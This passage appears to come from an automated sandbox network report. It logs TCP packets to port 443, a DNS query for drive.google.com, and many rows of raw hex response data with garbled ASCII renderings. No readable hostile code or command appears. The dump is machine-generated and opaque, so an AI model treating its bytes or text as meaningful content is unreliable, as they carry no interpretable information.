                                                                                            Nov 22, 2021 19:40:21.737657070 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.737721920 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.792342901 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.792573929 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.794605017 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.794764042 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.794841051 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.798468113 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.798500061 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.798964024 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.799083948 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.799452066 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.839992046 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.050637960 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.050880909 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.050895929 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.050945044 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.050976992 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.051012039 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.051054955 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.051158905 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.051876068 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.052067995 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.052110910 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.052125931 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.053251982 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.053514957 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.053575039 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.053822994 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.053981066 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.054146051 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.054214001 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.054471970 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.061546087 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.061721087 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.061774015 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.061810970 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.061918020 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.061954021 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.061985016 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.062218904 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.062338114 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.062536001 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.062599897 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.062866926 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.063085079 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.063251019 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.063298941 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.063550949 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.063870907 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.064111948 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.064157963 CET44349807142.250.185.161192.168.11.20
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                                                                                            Nov 22, 2021 19:40:22.064738989 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.064779043 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.064974070 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.065196991 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.065440893 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.065496922 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.065756083 CET49807443192.168.11.20142.250.185.161
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                                                                                            Nov 22, 2021 19:40:22.066312075 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.066520929 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:22.066783905 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:22.067059040 CET49807443192.168.11.20142.250.185.161

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 22, 2021 19:40:20.993186951 CET5783953192.
                                                                                            Nov 22, 2021 19:40:21.003087044 CET53578391.1.1.1192.168.11.20
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                                                                                            DNS Queries

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                                                                                            Nov 22, 2021 19:40:20.993186951 CET192. query (0)drive.google.comA (IP address)IN (0x0001)
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                                                                                            DNS Answers

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                                                                                            2021-11-22 18:40:22 UTC22INData Raw: b3 66 c0 18 93 89 cc 41 84 05 53 6b fb bc 29 aa 63 78 a9 e2 11 00 37 ab e9 53 a7 86 31 9b b5 bf 06 89 50 15 90 24 26 aa 02 4e 3f e3 06 af 28 d2 25 24 de 34 1c af e7 6c a0 b0 a8 21 87 c3 59 a6 ad aa 51 e6 f7 c8 85 07 00 ef a6 b1 06 26 d0 37 bb 10 94 c9 44 3d a7 09 2e a5 05 38 95 f3 5c 92 26 87 05 1c f4 ba 39 c1 7b 9b 0d 9b 5f 6f 28 54 6c 0a ee 53 3b 97 ad ad 7a 9f dc 63 4d 9d f6 30 81 94 97 ec 08 1d bb 84 15 a4 ca 8c b2 0a f8 74 37 c7 68 26 42 81 16 18 b3 5c 4d 68 17 ee 96 65 fe bb 8b b0 e5 8c 5e dd 88 15 46 b6 f3 cf e1 73 8b 95 49 5c 31 c1 7f 30 26 1d 27 09 db 67 d0 e0 74 0b ca c0 c0 b7 de e5 cb 40 60 ea 34 b4 ca 84 d8 51 1d bf a0 8d df 62 62 a6 5a 4c 41 54 d4 eb 5c 21 57 b0 eb 13 1f 1f 0a a2 06 b2 0d 04 8a 51 f0 9d 26 57 ef 21 f4 8b 38 7c 34 c2 75 2c 3f
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                                                                                            2021-11-22 18:40:22 UTC23INData Raw: 30 49 2a 26 2b 54 20 e8 20 5c 36 17 61 42 f6 45 e2 a8 1d dc cf b8 4a 7d 3b 32 98 30 0c 0c f0 30 cc 11 02 31 20 1c d4 3f 21 98 af 16 89 31 8b 3c af 20 c3 ca 09 5d 2d a5 38 fe 14 89 8e 2b e9 31 de 05 38 8b db b6 9f 6d 03 3f 32 f4 27 b6 d0 6c 3e 05 93 55 40 b5 0c 03 01 21 b6 82 8a 12 20 ed 70 e2 ae 77 72 45 47 a1 12 ad 52 ab 14 3e 3b 2e d3 1b ed 09 4b 17 b7 7b 3c 67 fd b1 52 30 13 93 17 16 53 58 3a 82 09 59 b3 f3 7b 3c 92 c4 8c 85 d3 87 c4 81 2a f3 79 87 a0 fc ec 27 93 22 91 d7 49 ca 57 f9 14 77 fa d3 3a 7b 06 b3 c5 0d 57 19 a1 fd 13 2f f5 b4 65 0c b2 0b 26 13 55 97 75 12 19 be 3a ae d1 52 ed 9a eb 8b 63 a9 43 6e a7 08 43 0f 0e 97 be 18 37 82 81 63 5a 14 d7 c2 2f 2b 72 fe cf 2c f8 f0 e0 32 27 2a 89 9d b4 dd 93 67 aa 82 d2 4d af d4 5f 59 e2 b7 a6 95 81 0b 26
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                                                                                            2021-11-22 18:40:22 UTC24INData Raw: 39 0c f9 e9 43 a9 8f ec 36 01 60 a4 eb 92 2f 84 44 46 a6 7b 05 55 d0 4c 41 2c aa 11 b8 0c e6 ba 33 12 ab 9d 9b e2 bb 1b 4f 6f 16 72 93 9f 9e a6 4c 8f d6 53 ff cc 88 e7 88 28 a4 a1 c9 1d dc f8 3b 10 7b b0 c5 b0 21 5b fb 0a 6f 31 6d 04 e6 12 70 00 8e 6f 8f 9a 19 38 d8 c9 b9 70 81 19 40 c3 69 9f f3 29 a1 60 72 a7 0d a3 6d bb 71 48 52 f8 df ce 1b 6c e0 5c a2 fe bf a4 48 84 20 bf 5d 4f 92 9f f1 93 88 12 65 cd b3 3c c1 03 dc 7b 9a 04 13 53 68 14 5b df 54 71 5b f8 8b cc 85 93 6d 9f 01 5e 18 30 91 64 bb 2f 6f c3 ee 44 b3 96 11 be bc 4b 56 99 49 8b ba 0c 52 a5 b6 4b 7e aa 7a bd e7 d7 cd a2 50 df b4 ea 56 ac fb dc d7 d1 a7 5d 4e 82 ec 3b 4f 5b 10 dc 77 49 c1 d0 59 90 95 fe 53 1a af 34 4e 7c 12 83 aa 85 ba 52 9c ab 34 a8 e9 f7 03 d0 52 7d a7 40 f0 62 74 02 95 59 8e
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                                                                                            2021-11-22 18:40:22 UTC26INData Raw: 8d 7e 67 92 38 32 c7 1c c4 c1 d0 c6 01 a9 26 86 f7 08 a0 f3 39 7a b8 0c 6c 4e 45 e2 28 ca ab 8e b8 4c c0 46 2c d3 6d 41 f7 a0 bd 8e 67 bd b9 9e 4c da 14 85 70 7d 0f 8d 31 00 1b 53 91 6d e0 06 5d a0 6b 50 2b 6f cb fe 52 40 e4 21 3d b3 86 58 a7 12 cb c7 d3 23 20 b2 4d 04 c9 db e2 10 80 34 ba 04 b0 e2 2e 0d d6 62 cc 19 14 d7 1e b2 9b 16 63 bb 2a 21 4a 05 f6 aa 22 55 f6 d3 90 44 dc 30 57 23 c4 66 be 02 89 df 5d 9c 3a ef fc 1d 5c b1 cf 9f d8 94 1f 27 36 a9 4d 46 61 db 3c 33 8e 64 cc 7d 04 a0 f2 b2 dd c6 19 90 d1 95 ca 57 23 77 30 72 ea ff b1 c6 5a 9b 9d e0 65 c2 b1 9f ef 79 34 8d 0d 36 c3 c4 14 ab 98 23 b4 2c 37 7b 3d ac 9a e3 1e 1b b5 66 2a 84 e8 bf 81 a8 f3 e0 0c 1f 59 37 32 f2 2d a6 44 b2 0f 3d c3 84 a3 f0 dc f7 54 1b da b7 a2 41 75 43 7b 90 9b df 7d 85 94
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                                                                                            2021-11-22 18:40:22 UTC27INData Raw: d0 e2 99 23 cd 3f 4c 45 26 6f 8f 0e 83 ee d2 61 13 9c 3f 7f 43 fb 8a c7 16 13 b8 04 e3 ef 11 8e 64 96 94 25 97 55 be ca 54 32 20 aa c8 97 8b fc 50 b0 0c 5c dd 49 f5 39 97 ec fd 70 15 eb 89 68 9f 73 d8 bc 78 2d b3 6a a0 75 97 64 2f f0 20 cb b8 01 04 a5 39 46 8b 28 04 05 eb 3b 81 0f 3c 10 2c 6d e7 d6 a2 6c d7 a6 d3 b1 f0 29 2c 6c 39 f2 bb cf 89 85 f6 91 04 1c f5 5a 73 8b 0b ed 6f 2b c0 dc e7 cd ea 58 ec 25 6d ec 31 d7 91 50 85 60 5d ef c1 fb b8 86 b8 dd 46 c9 f7 90 35 e0 6d a3 82 69 02 e5 07 8b fa 00 29 70 21 76 07 90 b7 c1 e3 01 79 24 9a 7d a7 86 7e 17 66 a7 e0 de a2 c5 42 76 79 23 b9 b5 8a d4 4f 57 3d d0 1f 80 d3 98 d8 23 fd d4 0d 5f 45 99 c9 c0 59 ea 0a 40 92 f7 e0 61 61 48 16 48 9d 2a 6e 63 24 c5 1b 7f 6d 3f a2 b5 74 de 91 17 d0 6f 8c b0 d2 bd 1d 1c fa
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                                                                                            2021-11-22 18:40:22 UTC28INData Raw: f0 1a 05 fa fd 11 b1 df 9d 8e bc 9a 63 16 86 91 32 b5 51 9b e8 ec 73 24 56 ce d5 20 81 ed 5b bd 72 f0 6f 4e c1 87 23 81 57 d0 82 50 e2 4e 8d 03 56 7f bc 0b 38 bb 4e 97 41 88 ea ec 96 97 2d 19 a0 b3 72 31 74 df e6 c1 ea 24 0e 78 d2 2e 37 7b 23 47 0f b1 1d b0 19 5b 47 41 f6 7c 5d 0d fe c7 31 b9 b1 81 4a 0f 5a f2 b0 93 f8 87 48 3b 0c a6 0a 07 48 8b 9e 69 72 1e aa f3 98 e1 c8 59 9b 8a a6 33 3c c2 10 d1 d3 6f 1d 4d 72 10 f2 ed 3d e6 1a 76 ab 10 9b d9 ef 74 db 6f f9 0b 1e 91 e9 56 68 b9 ef 7c 24 b2 65 b2 0a ca 12 f4 b1 06 a4 63 9d d2 88 a9 3d 76 4e 00 dc aa 75 30 76 7b b2 f0 cb 4d b1 bb 1f 5b 83 f4 e6 e5 bd c8 8d f2 7c 4f 3d 1c 85 1c 5b 83 d0 37 6f 99 22 9a a7 1e 3a 7e 44 6b 70 2b 28 c6 be cb c0 7e 9d a9 bc 2e f5 63 91 9f e7 cf 6c df b3 bb 07 a2 ba 80 9a b0 7d
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                                                                                            2021-11-22 18:40:22 UTC29INData Raw: 11 56 59 4d 73 b8 68 76 cc b1 15 1a 6b 82 4c 0f 8d 83 7b 56 64 a8 ee 54 c5 b7 25 35 0d bf 73 8e be 4e 12 0e 0c 78 08 13 fb c7 bd de 57 97 12 62 de 93 d1 90 ca db ae 14 df a0 25 69 c6 be 63 86 2e 4c b9 92 10 a5 80 e6 68 28 eb ea 65 9a 74 e9 1d a4 c9 97 fc 94 2a dc c1 9f 90 ed 91 37 e0 bd 2d ae 95 d5 ad 92 06 2c 84 95 23 15 34 c0 33 6e be 72 16 97 b2 71 90 a4 48 a9 6a ef 77 3a ec a0 a7 60 d2 20 61 bd 82 b3 6e 30 ef d3 b9 d0 f2 63 1d d8 d7 a6 2b fd e5 a2 6d bb 5e 1e 56 0a e6 fa 84 e8 18 25 07 d1 fe 36 a8 d5 6e c8 ef 47 c6 fb ba 89 cc 9c f9 6c d3 f4 c1 dd ec 2d 88 42 e9 26 b4 68 bb 0f f5 64 af ac 56 a3 f9 36 3f be c3 92 43 4a 54 c1 11 78 2f 17 0e 8e f6 fe 32 53 43 92 ca 8e d1 d9 8b b6 74 68 56 1c f7 53 38 07 f1 ad 4a ad 36 34 5d 26 47 41 e8 a0 95 93 41 31 ad
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                                                                                            2021-11-22 18:40:22 UTC31INData Raw: 50 9b b4 64 74 21 bb 45 8c 27 bd 06 67 f4 87 de 52 23 15 b4 80 f3 71 aa 1c ae a5 01 07 f9 ef f9 1f 36 d5 9a 83 e6 f1 c9 29 ee 60 bc d7 ef c4 1e 66 2c c9 17 3b 44 7f 00 4f bb e7 d2 58 b5 c0 7b 75 e7 14 0f 92 62 d7 96 91 27 15 dc 6f 31 2a 04 df ee 95 28 3d 8d 10 dd 1d 85 d7 69 55 39 f7 35 02 93 06 ef 02 25 ba 33 0f 43 30 7f 1c 6e f7 61 a7 e0 01 5b 94 09 40 8a b8 a2 2e 87 6e 89 dc 26 23 2a 18 5d ab 27 35 cc 28 57 2f 55 03 77 87 f5 1d 9e 38 96 5a 8e 55 c7 1f 75 d3 2c b7 dd 5d cc 59 dc f4 d5 9d f8 87 40 18 06 90 6f 11 d7 2c 0c bd 97 ba c9 06 5d 5f f2 c2 db f9 2b dd 68 fe c4 e5 c2 43 0a 86 ff 84 bd ff 82 cb ab 66 3a 8f 2c df f9 f7 a9 24 f0 df ae d3 6c 4e 33 dc 56 5f 14 f5 e7 bd 77 c9 aa 00 90 d0 a7 bd 22 69 70 a8 45 3f f9 18 d9 37 41 1c f7 aa bb 65 9b da 3d cd
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                                                                                            2021-11-22 18:40:22 UTC32INData Raw: 09 4f 7b 41 2b c0 7a cd 71 69 b3 dc 7a 9e e9 bb 43 c1 1b 12 d6 ad 17 0a a2 45 c3 b4 84 fd 47 67 ba 50 8e cf d5 9b 67 8f 3f 5f b7 f3 a0 ed 18 86 2c 4c 5d b6 48 78 ca d2 2f 9b 5f 21 ca 1d be 7d 46 62 bc 70 52 fe 7e 8e 0c 60 38 a5 a9 2c 7f d4 ec 5c 67 93 fd 24 7f 04 1d 4c 28 d2 a6 c9 0c 0d cb c5 93 8b b5 99 a9 21 04 2e 16 a2 ca 19 08 62 9f 6d c1 0f 56 9d 97 99 9d 5e 29 5d a3 87 c1 3c 70 58 f3 09 1c 85 f1 14 66 08 a3 6d d6 57 fc 02 ae df c4 0f 90 34 79 e9 25 b2 ea 58 6c a3 d1 86 38 19 91 af 29 60 af 41 45 e5 b7 30 38 55 70 13 7f 84 ca 75 b4 d6 8b 64 52 91 36 9c e1 48 93 87 54 05 07 95 ff fb 20 ac 7e 60 69 9a 23 7f 7e 59 05 79 c6 22 9f 47 b8 92 db cf c2 4e 74 6a 2f 46 5f 9e 1b 89 0b 01 ae 28 74 97 03 52 da 0c 63 ff 91 33 5b 13 c4 4d 62 cc 00 e5 ca 35 2f a5 f1
                                                                                            Data Ascii: O{A+zqizCEGgPg?_,L]Hx/_!}FbpR~`8,\g$L(!.bmV^)]<pXfmW4y%Xl8)`AE08UpudR6HT ~`i#~Yy"GNtj/F_(tRc3[Mb5/
                                                                                            2021-11-22 18:40:22 UTC33INData Raw: 06 86 27 dd 3b 34 35 e0 73 0c 86 4a 33 b4 31 d6 0e af 38 f8 f8 bf 0c 97 f0 5a 0e 06 bd 7c 8a b0 74 b2 1f 81 6e 31 36 c3 61 ef e8 a5 63 8c e9 c6 a3 78 f4 23 4d b5 42 eb 0f 8b 79 8e 6b 0f 56 5e 80 ac 29 3f 27 c4 97 0c 41 f7 f0 30 86 58 5a cf 26 30 da 1c 2d c8 ae 49 37 ce 74 07 c3 79 2b e4 86 d0 62 3a 20 2f 7e 86 0a 3f 2d 45 c4 49 79 eb 9f 25 26 7b 74 3b 32 03 bc 3b ce b4 aa d8 e7 51 8b cc ce c5 3d 7e 81 0f 95 99 aa e3 c0 f3 0a 88 64 a5 84 fe 4c 9c 0b 30 f4 ca 60 a5 3f 13 f1 e8 ee 4e 00 f7 b5 2a 01 21 dd 4d 98 3a 4c 6d 1d 5c 50 c2 0b 55 fa 1b ac 5a 6d c4 07 75 05 8e de a5 60 b6 79 0c 97 92 e0 51 d2 22 2e 01 58 0a 27 3b fc 17 9a d2 e2 81 af b2 e7 bb 0a 9a 3b bd 67 04 7b 67 65 5c 28 71 c7 7d 11 1a d8 10 44 ee d2 4e b4 28 e4 a6 af 03 1a 45 e8 6e 2d 14 17 63 a3
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                                                                                            2021-11-22 18:40:22 UTC34INData Raw: f4 50 aa 0c 17 27 94 72 32 41 35 8c 5b e8 89 6e 34 fa 9d e6 d7 4c 72 2f 37 63 4c 68 7d 69 32 86 9c ac 9b 8e a8 b7 85 bd cf a3 8f 4b 75 d5 06 95 0a fc e6 7c cf 06 18 38 e0 0a d0 93 20 b1 41 84 d7 a2 c6 ac 22 ef de bb d9 cc 4f 5a 68 ad 5c 62 9d 61 1f 0c ea 49 be de 90 17 68 e8 5c e4 6e 99 85 f3 7f 82 37 6d 2e 9f 07 da 41 84 b0 be d3 b8 65 31 72 56 f5 b9 7a 8f 69 04 ee df 5b 2b 0c 3c ed 8b e2 d3 8c 94 ba 7f 82 19 5d bf 98 5f 01 84 75 ed fc 7f 5f f5 3a 39 97 77 47 68 22 c1 2b 0f 69 da 3a 43 32 67 24 48 48 ee 7a 31 d8 81 ad 7a 9f 28 a5 66 8d b7 38 69 de 2f 47 a3 a3 ca 37 45 4c 4b f4 fd e5 59 28 dd cb 6c fb 6f 7e 9c d8 a3 b7 60 46 71 ac c1 35 40 5a ea f6 12 4b 40 ba 22 ca 77 72 ff a4 61 95 db c2 93 78 29 c8 69 d8 af 6f 66 5c f1 d7 34 46 8c d1 a9 5b c7 fa 5b 90
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                                                                                            2021-11-22 18:40:22 UTC36INData Raw: 5b d9 18 72 0c 2b d2 78 68 bc d6 4f 86 cb ce ac 26 63 0d 64 8e f4 91 b2 50 d6 48 58 b7 b1 66 cc 37 7b 9f 13 15 fd fb f0 e8 34 4f 48 fa 10 d6 e3 c3 be 31 10 64 c2 ef c3 da a9 ce 2a 1b f8 af 24 39 37 18 e4 fd 86 c4 0c fd 52 d3 cf cc 94 0e 50 c5 e3 8d 3d e6 f1 44 16 94 ac 47 6e 99 d5 59 25 98 2c a3 72 24 43 24 ea 79 92 88 7d 1c 2d 94 b8 00 a3 86 e1 3f 87 21 21 d7 f6 b1 ed f7 26 e0 f0 7a 32 4e 25 c9 c8 84 c6 64 6c aa 34 2f 99 0a 1b 6d b0 c7 8a ab 77 90 69 95 55 e3 e0 6f 43 48 45 38 a9 0d 96 da ca 3b 1b e2 5c 8c 04 b8 48 6d 38 dd 59 0d 15 10 8d 92 e8 00 e2 36 2a 7d 76 9d 98 5a ac 8b fa be 46 75 ec 05 b0 44 10 1e 50 78 98 05 65 be 0e 22 78 fe 39 9d d4 94 fd 09 b5 39 9c f9 9a ad db 4b 92 df 85 ac ec 40 b5 f6 6d 05 be c9 3c d6 b5 87 dd e0 e8 ab d2 57 60 d7 96 d8
                                                                                            Data Ascii: [r+xhO&cdPHXf7{4OH1d*$97RP=DGnY%,r$C$y}-?!!&z2N%dl4/mwiUoCHE8;\Hm8Y6*}vZFuDPxe"x99K@m<W`
                                                                                            2021-11-22 18:40:22 UTC37INData Raw: 1a 56 1e 30 39 cc 75 0d 21 e0 dc f3 51 16 78 13 4d 6f 89 48 c2 50 d4 a4 70 c4 14 25 92 da 44 d5 c9 5a 82 f9 fb f1 31 59 af 42 62 24 d8 e2 42 e4 18 53 12 52 d0 ca 1a f1 85 8b 5a ea f8 8b 60 12 b0 8f c7 d5 6f c8 f0 37 c8 dc ad 71 64 22 f8 30 94 55 67 49 65 12 d7 1d bc 5c eb 8e bf 45 f3 9f 5e f2 72 0c b3 0f ed 4c 65 aa 89 50 cc 1e 7d cd 69 d2 07 1e b5 76 97 68 57 94 39 a3 a8 76 6c 25 51 a6 f3 03 00 3a 48 29 c4 f0 26 1c 2c a8 55 a7 1c 79 38 da ce d6 7e 7c 2c 9d bc d1 ac fc f6 4d a7 54 ea 87 82 52 f8 5d 05 8f 84 64 86 0a 8c 73 e2 e6 0c 26 24 a2 e0 4f 6e ba 72 ed 5a 65 9d 44 eb 57 2b de d2 13 78 94 ca b3 b5 f8 ad 26 02 4d 7b b4 b2 d9 3a 87 be 7a 6d 59 b3 8f c9 18 16 ee 96 33 57 40 7e f6 3e 4b 40 ba 22 ca 79 fa d7 3b 2a f1 af 89 47 d2 3d c8 c6 25 16 b4 d8 a3 53
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                                                                                            2021-11-22 18:40:22 UTC38INData Raw: 1d 97 44 e5 7a 3f cd 3b db a6 2a 56 3e e6 8d 87 0d e6 97 95 0b 75 f1 79 d3 0a b0 25 63 3e 84 d1 a5 a8 e1 a5 65 bc 22 f9 35 1b e8 36 7b 12 3d 21 16 be c7 8f 95 3f b0 72 64 20 a7 5d 12 1a 5e d3 6d 08 59 51 a6 79 6e 04 2c f0 ac 03 73 3c c4 d9 fd f2 a6 64 74 83 c0 0f 85 a9 90 94 1a 30 9a 98 f0 30 0b 7f 56 3c 20 1c 07 a6 30 9c 35 f2 8d ba 86 0a cc 3b 2b 69 82 79 b5 2e c8 7b 61 42 2a ea 60 70 ce 41 ff cf fc 1f 03 22 74 c4 b9 3c a5 27 2f 7b d0 ab cf 32 89 45 de 9d 8e a5 c2 86 e0 10 b0 81 29 fd ef 77 9b 3e bc d1 1e 38 43 2a 8c 8b 35 a5 de cc 7a ce bd 48 ba 6d 3c 98 e8 7a 26 51 64 59 53 db 11 d5 7e a6 2b d8 ae 3f 88 62 55 80 23 59 c5 f6 8b 05 99 ab 5d bf 98 ef 28 22 93 22 87 8b 45 99 00 10 01 2a d9 ed 25 af b9 4d c5 60 6f cd b6 e9 a7 75 fc 37 e7 0a e4 05 e0 9a 29
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                                                                                            2021-11-22 18:40:22 UTC40INData Raw: 49 d8 a6 71 79 d3 4a a0 51 e4 ee 69 09 ba fb 7c 05 47 1d 13 dc fc 8a f7 e1 0c e3 4e 9d 10 3f 32 db 7a d0 10 c4 5a 1b e1 e2 d8 1e 48 a8 61 2f 9b 8f 11 5a 67 cc 07 ce 53 9f 2b 23 79 43 84 be 51 67 53 0f 3e 3e 96 b2 dd 9b ec ce 7e f0 30 a8 b2 b1 0e ed a0 c2 4a 74 e8 f6 87 d7 aa 64 15 46 34 16 d2 97 f9 a8 15 63 ba cf 8f ae 48 86 f8 76 17 6f d9 a2 15 df 8e 80 4f 3a 66 d8 5c dd e5 79 8f c0 98 63 ed 7b cc 5c 41 c3 04 a5 51 26 cc b9 6e 6f 43 29 c9 56 59 55 12 8e 5f 5a 51 61 39 d3 ab 8d 1c 0a bf 0b 35 59 ee 33 43 73 d0 62 6f b6 fc 59 70 56 9a 69 c5 ee 87 61 21 45 07 d3 29 a4 56 6b 39 54 41 26 37 4b 92 28 15 6d bb 32 e4 93 74 bc e0 1f 95 9f eb 5b bf 6c 8f 57 0c 9c 3e 29 93 87 26 37 fb 48 3e 92 98 ac 27 31 69 9a f8 bd 37 d1 05 0d bc 22 9f 41 b9 52 1b a6 6a 7a 74 18
                                                                                            Data Ascii: IqyJQi|GN?2zZHa/ZgS+#yCQgS>>~0JtdF4cHvoO:f\yc{\AQ&noC)VYU_ZQa95Y3CsboYpVia!E)Vk9TA&7K(m2t[lW>)&7H>'1i7"ARjzt
                                                                                            2021-11-22 18:40:22 UTC41INData Raw: 54 12 60 9a f1 4e 87 ee 69 ac 8b fe 66 ac c4 5d 3f e5 e8 90 1b c5 da 8b 92 33 0c aa 94 0a 38 88 f4 58 d5 1a 9e 5c 26 63 df f9 f5 b5 11 a6 66 ea 7c 57 f1 d9 47 63 77 7b 74 40 88 47 12 68 cc 26 27 31 fe 2a 97 8b 78 32 4a d1 9b fe a9 bb 74 ae a6 ea ac 49 a0 48 a8 ba 5d 18 d9 a4 16 5c 38 df 92 cf ee a9 8c be c4 17 4b 69 8d 30 3f 8e 15 43 46 61 4a dc 6c c1 e9 07 b3 00 b4 7b b9 54 86 7b 1b d0 0e 7e 7d 9b 28 b1 0b 4f 42 bd bc 9b 36 6e 90 ff a4 60 f1 77 c4 27 b8 3d f3 89 01 ef 05 16 85 cb 45 89 cc 53 51 cd 00 48 12 e7 eb 1b 55 28 32 63 2e 4b a1 12 97 06 a2 ac 47 70 d6 83 1d 98 7c 72 e7 cc 7c 6b 98 88 8a ab 05 20 a2 56 ff 98 9c 35 07 fe 55 ea 1b 53 47 6e 3b 12 25 26 30 cb 88 95 07 96 78 98 aa 69 d5 22 fd 87 01 1d 35 81 12 58 0b cf ba ff 7d 1e 6d 4e bb 4f 65 5c ec
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                                                                                            2021-11-22 18:40:22 UTC42INData Raw: eb 08 34 e5 f4 5b 49 f8 d6 0e 05 12 cf ac a2 c9 53 5d 53 99 61 22 eb 60 39 8d 2c f9 bc 58 2b d3 2a 77 05 2c 42 ed 33 65 12 07 3e da 80 55 ed 88 54 9b d4 d2 68 ea b8 17 64 5a 15 e6 c9 a4 d3 b3 41 d0 55 a7 23 f8 6a 1d 14 ec 05 ea a0 fa 85 f9 03 4e 9c 22 bc 3e 8f 04 6b 1c b4 ae 61 4c 75 4e f6 03 77 5c 5b a8 d9 e3 ea 07 c2 cc 50 8d 41 55 ef 5f ad 74 04 e3 5a 64 08 94 48 ec 17 0c 8c af e1 5c ba 4a 99 ef d7 c7 42 33 93 34 c8 bf b4 4d f0 f6 23 cd 85 49 99 a2 f3 69 57 3b 4c c8 39 82 1b fc bb f1 05 96 5d f0 ce 33 7a 1d a4 83 58 e8 60 a3 ed fc 4c d7 2e e8 6f 6c 77 ad ab 02 68 d8 f5 9b 79 e3 05 33 ea 58 e5 01 a9 f4 3d 9c d5 52 85 60 92 f8 a5 1a 48 cf 3a 8e 6c 3b 79 6f ca e3 d0 b0 47 f1 46 e7 07 8b 03 a9 e5 39 ab 9a f0 01 b3 df 31 c9 f4 e8 6b 9a 57 60 f7 44 35 02 45
